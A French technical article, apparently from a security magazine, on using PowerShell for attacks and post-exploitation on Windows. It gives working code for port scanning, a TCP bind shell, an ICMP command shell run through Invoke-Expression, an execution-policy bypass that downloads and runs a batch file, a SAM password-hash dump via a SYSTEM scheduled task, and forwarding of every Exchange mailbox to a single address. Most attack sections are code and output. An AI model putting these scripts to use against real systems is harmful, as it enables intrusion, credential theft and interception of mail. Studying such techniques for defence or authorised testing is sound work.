Nombreuses sont les étranges ressemblances entre Powershell et les shells issus du monde libre ; il est évident que Microsoft s'en est inspiré ! Mais peut-on leur reprocher de s'inspirer des bonnes choses ? L'objectif de cet article n'est clairement pas d'alimenter cette polémique, mais de démontrer qu'un attaquant peut profiter des fonctionnalités de cet outil puissant...
1. Introduction
Outre ses similitudes avec Bash, Powershell est intéressant à étudier car il s'agit là : d'un shell orienté objet, donnant l'accès à l'intégralité du Framework .net, permettant d'interagir directement avec les différents composants de Microsoft (Active Directory, Exchange, SQL server, SharePoint, Hyper-V, ...), intégrant des méthodes permettant d'effectuer du parsing à la volée, permettant l'utilisation des expressions régulières et, évidemment, d'interagir directement avec le système de fichiers.
Présent de base sur les versions de Windows Seven et de Windows Server 2008 R2, Powershell est intimement lié au système ; pour cette raison, il ne semble pas possible de le désinstaller sans rendre le système instable.
2. Base Powershell
Contrairement au prompt classique (cmd.exe), Powershell se présente sous la forme d'un shell blanc sur fond Blue Screen Of Death, enfin extensible.
Avant de commencer, notez bien que Microsoft a introduit la notion d'alias dans Powershell par l'utilisation de la commande Set-Alias. La commande Get-Alias permet d'afficher le listing complet des alias. Par défaut, nous pouvons y trouver [1] :
|
Cmmlet |
Powershell Alias |
DOS |
Unix |
|
Copy-Item |
Cp, copy |
Copy |
Cp |
|
Move-Item |
Move, mv, mi |
Move |
Mv |
|
Remove-Item |
Rm, rmdir |
Del |
Rm |
|
Get-Help |
Man, help |
Help |
Man |
|
Get-Content |
Cat, gc |
Type |
Cat |
|
Select-String |
- |
Find, findstr |
Grep |
|
Get-childitem |
Ls, dir |
Dir |
Ls |
2.1. Définition d'un alias
PS C:\misc> Set-Alias test ls
PS C:\misc> test
Directory: C:\misc
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 2/06/2012 0:27 16 hello
Comme expliqué ci-dessus, Powershell a la spécificité d'être orienté objets et ceux-ci sont bien entendu manipulables. Exemple basique : nous souhaitons récupérer le contenu d'un répertoire, nous pouvons utiliser Get-ChildItem ou l'un de ses alias.
Si la sortie n'est pas exactement celle que vous attendez, il est possible de la modifier facilement en spécifiant la ou les propriété(s) que vous souhaitez traiter. Il n'est pas nécessaire de connaître le nom des propriétés de l'objet, la commande Get-Memberest là pour vous aider. L'utilisation d'un pipeline vous permet de lister les propriétés de la commande Get-ChildItem (ou son alias ls) :
TypeName: System.IO.FileInfo
Name MemberType Definition
-------- ------------------ ----------
Attributes Property System.IO.FileAttributes Attributes {get;set}
CreationTime Property System.DateTime CreationTime {get;set}
CreationTimeUtc Property System.DateTime CreationTimeUtc {get;set}
Directory Property System.IO.DirectoryInfo Directory {get;}
DirectoryName Property System.String DirectoryName {get;}
Extension Property System.String Extension {get;}
FullName Property System.String FullName {get;}
...
Comme vous avez pu le constater, Powershell permet de mettre dans le « pipe » un objet... Imaginons que nous souhaitons récupérer les extensions de fichiers. Powershell permet donc ce type de syntaxe :
PS C:\misc> ls | select-object extension
Extension
---------
.txt
.txt
Autre point important, le mot-clé $_permet de traiter « l'objet courant » et d'utiliser les objets de pipe en pipe :
PS C:\misc> Get-Service | where { $_.Displayname -match "active" } | foreach-object { "Service : " + $_.Name }
Service : ADWS
Service : MSExchangeADTopology
Service : NTDS
Service : UI0Detect
Oui, la syntaxe Powershell n'est pas très sexy, mais on finit par s'y habituer... Autre fonctionnalité pratique pour les scripts de récupération d'informations : le formatage d'une sortie au format HTML (avec CSS), CSV, XML :
PS C:\misc> Get-Service | select-object name,status | convertto-html > test.html
PS C:\misc> .\test.html
L'objectif de cet article n'étant pas de présenter l’intégralité des fonctionnalités de Powershell, reportez-vous aux articles s’y rattachant pour plus d'informations concernant son utilisation [2].
3. Powershell et les sockets ?
Comme expliqué ci-dessus, Powershell permet l'utilisation des objets du Framework .net. Il est donc tout à fait possible de programmer en quelques lignes un simple « TCP scan port ». Certes, il s'agit là d'un script bien loin des possibilités d'un outil comme Nmap, mais il n'en reste pas moins efficace et ne nécessite pas l'installation de Nmap ni de la winpcap :
1..1024 | % {
try {write-host ((new-object Net.Sockets.TcpClient).Connect("192.168.1.159",$_)) "$_ is open" } catch{ ; }
}
Sortie :
PS c:\misc\ > .\tcpScan.ps1
53 is open
88 is open
...
Ou encore un simple « port sweep » :
1..255 | % {
try {write-host ((new-object Net.Sockets.TcpClient).Connect("192.168.1.$_",445)) "Open => 192.168.1.$_ " } catch{ ; }
Sortie :
PS c:\misc\ > .\tcpRangeScan.ps1
Open => 192.168.1.2
4. Powershell & Nmap
Il est agréable de constater qu’autour de Powershell, une communauté de « bidouilleurs » s'est créée. Conscient des possibilités de Powershell, Jason Fossen, un formateur du SANS, a développé un script capable de traiter une sortie XML d'un scan Nmap. Il s'agit là d'un bon exemple des possibilités de Powershell dans le cadre de scripts destinés à faire du parsing à la volée [3].
Il n'est donc pas très compliqué de filtrer les résultats d'un ou plusieurs scans Nmap et de générer un rapport au format HTML ou CVS.
Pour générer un rapport au format HTML répertoriant le listing des serveurs DNS détectés lors de vos scans :
PS C:\misc\nmap>>> .\Parse-Nmap.ps1 *.xml | Select-Object mac,ipv4, ports
| where { $_.Ports -match "open:tcp:53" } | convertto-html > test.html
Notez que convertto-html permet également l’ajout d’une CSS dans le rapport.
5. TCP Remote Shell
Si vous aimez bidouiller, vous connaissez certainement les outils Netcat [4], Socat et Cryptcat. Outre le fait qu'il s'agisse d'outils très pratiques pour manipuler les flux réseau, l'une de mes fonctionnalités favorites est celle-ci, qui permet d'obtenir un shell sur une machine Windows :
nc.exe -L -d -p 4242 -e cmd.exe
Malheureusement, il n'y a pas (encore) de script Powershell implémentant les fonctionnalités de Netcat. Cependant, il est tout à fait possible d'obtenir un shell distant via Powershell en redirigeant les I/O d'un processus qui exécute un cmd.exe.
Afin de rendre cela possible, nous allons commencer par un ouvrir un socket en écoute sur le port 4242 :
$Port = 4242
$Enc = New-Object system.Text.ASCIIEncoding
$Sock = New-Object system.Net.Sockets.TcpListener $Port
$Sock.start()
$client = $Sock.AcceptTcpClient()
$Stream = $client.GetStream()
$RecvBuf = New-Object system.Byte[] $client.ReceiveBufferSize
Le socket étant créé, nous pouvons lancer un processus exécutant cmd.exe. Notez que les propriétés RedirectStandardInput et RedirectStandardOutput [5] ont été mises à 1, ceci afin que nous puissions rediriger l’entrée/sortie de notre processus.
$MyShell = New-Object System.Diagnostics.Process
$MyShell.StartInfo.FileName = "c:\\windows\system32\cmd.exe"
$MyShell.StartInfo.UseShellExecute = 0
$MyShell.StartInfo.RedirectStandardInput = 1
$MyShell.StartInfo.RedirectStandardOutput = 1
$MyShell.Start()
Pour plus de lisibilité au niveau du code, nous allons stocker les I/O dans les variables InputShell et OutputShell :
$InputShell = $MyShell.StandardInput
$OutputShell = $MyShell.StandardOutput
Start-Sleep 1
À présent, il ne nous reste plus qu’à écouter sur le socket en lisant l’entrée (notre commande) et en affichant la sortie de notre commande :
while($Bytes = $Stream.Read($RecvBuf, 0, $RecvBuf.length))
{
# INPUT
$In = $Enc.GetString($RecvBuf, 0, $Bytes)
$InputShell.write($In)
# OUTPUT
if(($OutputShell.Read()) -gt 0)
{
while($OutputShell.Peek() -ne -1)
{
$Out += $Enc.GetString($OutputShell.Read())
}
$Stream.write($Enc.GetBytes($Out), 0, $Out.length)
}
}
À l'aide de ce script, on peut donc assez facilement obtenir un Shell via un client Netcat :
Sortie :
[ grml@labz:~/lab/misc ]$ nc 192.168.1.159 4242
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>
Notez que l'utilisation de System.Diagnostics.Process pour lancer un cmd.exe n'est pas forcément la meilleure des choses à faire car nous ne pouvons plus bénéficier des fonctionnalités Powershell via notre Remote Shell ! Voyons comment améliorer le shell et bénéficier de Powershell via un socket…
6. ICMP Bind Shell
J'ai souvent constaté que la plupart des administrateurs système désactivent le firewall de serveur parfois même en production. Bien que cette mauvaise habitude a tendance à m'irriter ; une autre de leur manie consiste à autoriser l'ICMP Echo Reply afin qu'ils puissent utiliser la commande ping. Il s’agit là d’une pratique qui n’a a priori aucun impact sécurité.
Partons donc du principe que le firewall est actif, mais que le protocole ICMP a été autorisé ; nous pouvons alors utiliser le champ de données de l'en-tête ICMP pour transmettre une commande à notre shell.
Pour que cela puisse fonctionner, notre script doit être en mesure d'intercepter les paquets ICMP, d’isoler le champ data, pour ensuite exécuter notre commande. Nous devons donc commencer par coder un sniffer ICMP à l’aide de Powershell.
On va commencer par créer 2 fonctions de casting :
param([String]$IpServ = "none", [String]$IpClient)
function NetworkToHostUInt16 ($value)
{
[Array]::Reverse($value)
[BitConverter]::ToUInt16($value,0)
}
function ByteToString ($value)
{
$AsciiEncoding = new-object system.text.asciiencoding
$AsciiEncoding.GetString($value)
}
Comme dans notre script précédent, on déclare notre socket, mais cette fois-ci, nous allons utiliser un RAW socket :
$ByteData = new-object byte[] 4096
$MySock = new-object system.net.sockets.socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)
$MySock.setsocketoption("IP","HeaderIncluded",$true)
$MySock.ReceiveBufferSize = 4096
$IpEndPoint = new-object system.net.ipendpoint([net.ipaddress]"$IpServ",0)
$MySock.bind($IpEndPoint)
Si vous avez déjà codé un sniffer, vous savez qu’il faut avant toute chose passer la carte réseau en Promiscuous mode qui permet d’intercepter tous les paquets qu’elle reçoit (et cela même si les paquets ne lui sont pas explicitement adressés).
# Go Promiscuous mode
$IN = new-object byte[] 4
$OUT = new-object byte[] 4
$IN = 1,0,0,0
$OUT = 0,0,0,0
[void]$MySock.iocontrol([net.sockets.iocontrolcode]::ReceiveAll,$IN,$OUT)
À ce stade, il ne reste plus qu'à découper correctement les données, en commençant par l'en-tête IP [6] :
while (42)
{
$RcvData = $MySock.receive($ByteData,0,$ByteData.length,[net.sockets.socketflags]::None)
# Voir RFC 791 & 792
$MemStream = new-object System.IO.MemoryStream($ByteData,0,$RcvData)
$BinReader = new-object System.IO.BinaryReader($MemStream)
# IP HEADER
$iph_Version = $BinReader.ReadByte()
$iph_TOS= $BinReader.ReadByte()
$iph_TotalLength = NetworkToHostUInt16 $BinReader.ReadBytes(2)
$iph_Id = NetworkToHostUInt16 $BinReader.ReadBytes(2)
$iph_Flag = NetworkToHostUInt16 $BinReader.ReadBytes(2)
$iph_Ttl = $BinReader.ReadByte()
$iph_Proto = $BinReader.ReadByte()
$iph_Checksum = [Net.IPAddress]::NetworkToHostOrder($BinReader.ReadInt16())
$iph_SrcIp = $BinReader.ReadUInt32()
$iph_DstIp = $BinReader.ReadUInt32()
puis par l'en-tête IMCP [7]:
if ($iph_Proto -eq 1)
{
# ICMP HEADER
$icmp_Type = ByteToString $BinReader.Readbytes(1)
$icmp_Code = ByteToString $BinReader.Readbytes(1)
$iph_Checksumm = ByteToString $BinReader.readbytes(2)
$icmp_Id = ByteToString $BinReader.readbytes(2)
$icmp_Seq = ByteToString $BinReader.readbytes(2)
Pour éviter le « bruit », on filtre sur l’IP source. On peut ensuite utiliser la méthode Invoke-Expression afin d’exécuter notre commande. Notez que vous pouvez à présent utiliser toutes les fonctionnalités de Powershell via ce Shell distant :
if ($([system.net.ipaddress]$iph_SrcIp).tostring() -eq $IpClient)
{
Write-Host "[-GET-] " $icmp_Data.tostring() " from " ([system.net.ipaddress]$iph_SrcIp).tostring()
Invoke-Expression -Command $icmp_Data.ToString()
}
}
$BinReader.Close()
$MemStream.Close()
}
Maintenant qu’on a notre serveur, nous avons besoin d’un client pour envoyer les commandes au Bind Shell. Sans se casser la tête, on peut donc utiliser System.Net.NetworkInformation.Ping :
PS C:\misc> $MySock = New-Object System.Net.NetworkInformation.Ping
PS C:\misc> $Cmd = "get-acl"
PS C:\misc> $Enc = New-Object System.Text.ASCIIEncoding
PS C:\misc> $Buf = $Enc.GetBytes($Cmd)
PS C:\misc> write-host $Buf
103 101 116 45 97 99 108
PS C:\misc> $MySock.send("192.168.1.159", 255, $Buf)
code
Output Server :
PS C:\misc> .\IcmpBindShell.ps1 192.168.1.159 192.168.1.9
[-GET-] get-acl from 192.168.1.9
Directory: C:\Users
Path Owner Access
---- ----- ------
Administrator BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow FullContr...
[-GET-] dir c: > c:\misc\test.txt from 192.168.1.9
Par l’utilisation de ce script, on peut donc utiliser les commandes traditionnelles (DOS) ainsi que les cmdlet de Powershell. Vous devez avoir compris qu’il est possible d’obtenir un « vrai » Remote Shell sur ICMP en bidouillant encore un peu… Mais là, c’est à vous de jouer...
Pour les plus difficiles à convaincre, sachez qu'il est également possible de créer un tunnel SSH en utilisant la lib SharpSSH... [8] ou plus traditionnellement, utiliser le service de Microsoft Windows Remote Management de Microsoft qui permet l'utilisation de Powershell via HTTP ou HTTPS [9].
7. Restrictions d'utilisation ?
Si vous avez tenté d'exécuter le script ci-dessus sur l'une de vos machines ; vous avez dû constater que, par défaut, Powershell est configuré pour interdire l'exécution de scripts :
PS C:\misc> .\ByPassRestriction.ps1
File C:\misc\ByPassRestriction.ps1 cannot be loaded because the execution of scripts is disabled on this system. Please see "get-help about_signing" for more details.
At line:1 char:24
+ .\ByPassRestriction.ps1 <<<<
+ CategoryInfo : NotSpecified: (:) [], PSSecurityException
+ FullyQualifiedErrorId : RuntimeException
PS C:\Users\joe\Desktop> get-ExecutionPolicy
Restricted
En effet, Microsoft a mis en place quatre modes de restriction d'exécution de scripts :
- Restricted : interdit l'exécution de scripts (mode par défaut).
- AllSigned : autorise uniquement l'exécution des scripts signés (mode le plus restrictif).
- RemoteSigned : autorise uniquement l'exécution de scripts distants lorsqu'ils sont signés. Aucune restriction concernant les scripts locaux.
- UnRestricted : aucune restriction concernant l'exécution de scripts.
Pour changer le mode de restriction d'exécution de scripts, l'utilisateur doit être administrateur local de sa machine :
PS C:\misc> set-ExecutionPolicy unrestricted
PS C:\misc> get-ExecutionPolicy
Unrestricted
Cependant, même si cette restriction est active, le passage en argument d'une commande Powershell depuis un prompt DOS classique est, lui, autorisé :
C:\Users\joe>powershell -command write-host hello
hello
Sur ce principe, plusieurs chercheurs ont présenté lors de Defcon 18 [10], le script createcmd.ps1[11], qui permet d'encoder un script Powershell afin qu'il puisse être exécuté à partir d'un prompt DOS traditionnel.
createcmd.ps1 étant un script Powershell, il est donc nécessaire de convertir notre script Powershell à partir d'une machine autorisant l'exécution des scripts... Une fois converti, il ne reste qu'à transférer le script bat sur la machine ciblée.
Pour exemple, ce script écrit sur la machine de l'attaquant :
PS C:\misc> cat .\ByPassRestriction.ps1
get-ExecutionPolicy | out-file Out ascii
Notez que le script ci-dessus ne fait qu'écrire le statut de la restriction d'exécution en application dans le fichier Out. À présent, il reste à encoder notre script dans un fichier bat :
PS C:\misc> .\createcmd.ps1 .\ByPassRestriction.ps1 | out-file poc.bat ascii
Pour récupérer le script sur la machine ciblée, nous pouvons par exemple effectuer une simple requête HTTP sur un serveur web :
C:\Users\misc-test>powershell -command "(New-Object System.Net.WebClient).Downlo
adFile('http://192.168.1.2:8080/bypass.bat', 'bypass.bat')"
Une fois le script récupéré, il ne reste plus qu'à l'exécuter :
C:\Users\misc-test>bypass.bat
Load complete.
PS C:\misc> cat .\Out
Restricted
Nous constatons donc que le script a pu s'exécuter malgré la restriction en application sur le système ciblé. Le script createcmd.ps1 peut s'avérer très utile pour encoder un script Powershell plus conséquent...
8. Dump de la SAM
Dans le cadre d'une post-exploitation, si l'attaquant parvient à obtenir les droits administrateur local, il lui est possible d'effectuer une extraction de la SAM. Pour rappel, la SAM est la base donnée des comptes locaux des systèmes Windows (contenant utilisateurs et mots de passe). Cette opération est possible par l'utilisation d'outils tels que pwdump. Cependant, c'est également possible avec Powershell via l'utilisation du script PowerDump.ps1 [12].
Pour extraire le contenu de la SAM, l'attaquant doit disposer des droits system32 ; le droit administrateur local n'étant pas suffisant pour effectuer cette opération. Afin de monter en privilège, l'attaquant peut utiliser la fonction « tâche planifiée » de Windows :
Script à planifier :
powershell -ExecutionPolicy Bypass -noLogo -command c:\misc\powerdump.ps1 > c:\misc\MyDump.txt
Création de la tâche planifiée :
C:\misc>schtasks.exe /create /ru system /tn PowerDump /sc hourly /tr c:\misc\PowerDumpTask.bat
Exécution de la tâche planifiée :
C:\misc\new>schtasks.exe /run /tn PowerDump
Résultat :
C:\misc\new>type mydump.txt
Administrator:500:aad3b435b51404eeaad3b435b51401ee:xxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
misc-test:1000:bf145de2c1dd4d83877e3d1a81156192:xxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
9. Autres aspects
Rappelons que l'utilisation première de Powershell vise à aider les administrateurs système dans leurs tâches quotidiennes ; ce qui implique que l'intégralité des cmdlet permet d'interagir directement avec l'environnement Microsoft.
Il existe bien des modules pouvant être utiles à un attaquant dans le cadre d'une post-exploitation ; notamment ceux fournis gratuitement par Quest [13] permettant, par exemple, la récupération de la liste des utilisateurs présents dans l'Active Directory...
Get-QADUser | Explort-CSV dump.csv
ou la cmdlet de base, nettement moins exhaustive :
Get-ADUser | Explort-CSV dump.csv
Les cmdlet Exchange, permettant le transfert de tous les mails à destination du serveur Exchange vers une seule mailbox :
Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress ben@company.com
Mais Powershell peut aussi être utile dans le cadre d'une phase de collecte d'informations : dans un domaine Active Directory, un attaquant peut rapidement obtenir la politique de sécurité des mots de passe en place :
PS C:\Users\joe> $domain = [adsi]("WinNT://mydomain.lab")
AutoUnlockInterval : {1800}
LockoutObservationInterval : {1800}
MaxBadPasswordsAllowed : {0}
MaxPasswordAge : {3628800}
MinPasswordAge : {86400}
MinPasswordLength : {7}
Name : {mydomain.lab}
PasswordHistoryLength : {24}
Conclusion
Microsoft fournit à présent un outil puissant permettant de distinguer les vrais administrateurs système des cliqueurs fous... Malheureusement, cet outil s'avère être une arme à double tranchant. En effet, plusieurs outils permettent de générer des payloads Powershell indétectables par la plupart des antivirus [14]. Microsoft semble avoir négligé les aspects sécurité de Powershell, ce qui en fait, pour un administrateur système, pour un auteur de malware ou pour un pentester, une véritable boîte de pandore...
Powershell est donc un outil puissant pour les administrateurs, mais aussi un outil redoutable pour un attaquant.
Remerciements
Un grand merci à Olivier Lagiewka & Gerald Bastin pour leurs conseils et leur relecture attentive.
Références
[1] http://technet.microsoft.com/en-us/library/ee692685
[2] http://technet.microsoft.com/en-us/scriptcenter/powershell.aspx
[3] http://www.sans.org/windows-security/2009/06/11/powershell-script-to-parse-nmap-xml-output
[4] http://netcat.sourceforge.net/
[5] http://msdn.microsoft.com/en-us//library/system.diagnostics.process.standardoutput(v=vs.80).aspx
[6] http://www.ietf.org/rfc/rfc791.txt
[7] http://tools.ietf.org/html/rfc792
[8] http://sourceforge.net/projects/sharpssh/
[9] http://technet.microsoft.com/en-us/library/cc781778(v=ws.10)
[10] http://vimeo.com/14581715
[11] https://github.com/RC1140/ZaCon/blob/382fd2c28a5d0c0463c9392811f8f493ba369222/createcmd.ps1
[12] https://github.com/RC1140/ZaCon/blob/382fd2c28a5d0c0463c9392811f8f493ba369222/powerdump.ps1
[13] http://www.quest.com/powershell/activeroles-server.aspx